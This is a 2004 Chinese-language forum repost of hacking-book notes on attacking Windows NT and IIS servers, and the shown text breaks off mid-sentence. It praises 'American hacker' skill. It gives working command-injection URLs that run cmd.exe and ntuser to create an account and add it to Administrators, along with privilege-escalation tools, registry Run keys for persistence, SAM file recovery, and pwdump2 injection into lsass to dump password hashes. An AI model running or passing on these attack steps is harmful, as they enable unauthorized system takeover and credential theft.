[轉貼][學習]美國超級駭客技術

生活體驗,心情故事,文化休閒,吃喝玩樂等話題分享。

[轉貼][學習]美國超級駭客技術

文章kevin5441 發表於 週二 6月 29, 2004 7:22 pm

還在用木馬等魚兒上勾,然後用prot掃瞄,或偷窺icp漏洞,或是猜密碼,或放或寄病毒網頁
等人打開來這些初等或中等的攻擊法嗎??美國駭客的實力真是另人無法想像,
他們只需利用網址就能輕而意舉的主動攻擊了,情結不輸給電影,我們的手法
對他們而言只是無須大驚小怪的小兒科......參考書為黑紅色的網路駭客與系統安全
(好像有新版的,小皇是舊版的,名稱與外關差不多)

書籍上的重點,作者是美國著名的網路安全專家,


遠端緩衝區溢滿{buffer overflow}
緩衝區溢滿是發生在程式沒有適當的檢查輸入內容的長度
,而導致緩衝區空間不足,因此,任何預期之外的輸入,就會
掩蓋掉CPU執行堆疊的其它部分.
遠端執行命令取得系統管理者權限
http://www.infowar.co.uk/mnemonix
遠端執行一個批次檔執行任意的程式
http://www.infowar.co.uk/mnemonix/Ntbufferoverruns.htm

ISSHACK http://www.eeye.com
在NT ISS網頁伺服器上執行程式碼
在本機中可以給使一位使用者加入到區域的管理者群組中的擴權程式
http://www.ntsecurity.net/security/getadmin.htm
有相似功能的其它程式 sechole升級版是secholed
http://www.ntsecurity.net/security/sechole.htm
(Domain Admin group) 網域管理者(升級)群組


cmd.exe NT命令解釋器
ntuser 程式 用來修改使用者,群組和政策的程式,可參考
http://www.pedestalsoftware.com

Sechole的啟動可靠在一個瀏覽器輸入一個適當的URL連網目標系統,例如下列
我們將Sechole上傳至/W3SVC/1/ROOT/SCRIPTS (這裡就是C:\inetpub\SCRIPTS)
然後用下面的URL網址啟動它
http://192.168.202.154/scripts/secholle.exe
這樣做會成功的將IUSR_machine_name帳號加入管理者群組中,我們並沒有
IUSR的密碼,因此我們為了要避免登入IUSR,通常是在目標系統上開個帳號,
做法是利用ntuser公用程式透過瀏覽器執行下列複雜的URL(為了方便閱讀內容經過裝飾)
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret
以上%20再網語中是空白的意思,所以以上網址會被執行為
(cmd /c 會送出ntuser命令到shell,在完成時終結自己)
cmd /c ntuser -s <servername> add <username> -password <password>
以上我們是以corpl做伺服機名稱,mallory是使用者名稱,secret當密碼,
用類似的URL攻擊者可以用ntuser幫你把mallory加到管理者群組裡,如下 (LORGUP是指某個區域群組)
cmd /c ntuser -s <servername> LORGUP APPEND <groupname> <username>...
http://192.168.202.154/scripts/cmd.exe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory
同機能的批次檔寫法如registry,cmd
內容: net localgroup administrators <USER> /add

安全系統ISS目錄和一些潛在可行的目錄
http://www.iss.net/xforce/alerts/advise6.html
以下/W3SVC/1/ROOT通常是指C:\Inetpub\還有News及Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin都是安裝Front Page之後衍生出來的)

放批次檔的地方
HKLM\software\Microsoft\CurrentVersion
\RUN [any]
\AeDebug Debugger
\WinLogon Userinit

------------------------------------------------------------

執行NT的NT Repair Disk Utility (rdisk) 會在%SYSTEMROOT%\repair
中產生一個壓縮過的SAM檔叫SAM._ ,還原法: C:\>expand SAM._ SAM
NTFDOS:NTFS驅動軟體http://www.sysinternals.com

可破SYSKEY的是Pwdump2 http://www.webspan.net/~tas/pwdump2
它可使用DLL注入的方法將自己的程式碼插入其它具有更高權限的行程中,
一但注入更高權限的行程之後,這些惡質的執行碼就可以自由的內部呼叫API,
來存取SYSKEY加密的密碼而不需將其解密.
pwdump2所瞄準的高權限行程是lsass.exe,它是區域安全授權子系統,
Pwd2是將自己注入到lsass的位址空間中,因此在執行Pwdump2之前必需動手
找出lsass.exe的行程邊號(PID),以下是用NTRK
kevin5441
SR40
SR40
 
文章: 0
註冊時間: 週日 6月 27, 2004 5:00 pm

回到 生活休閒哈拉討論版

誰在線上

正在瀏覽這個版面的使用者:Google [Bot] 和 40 位訪客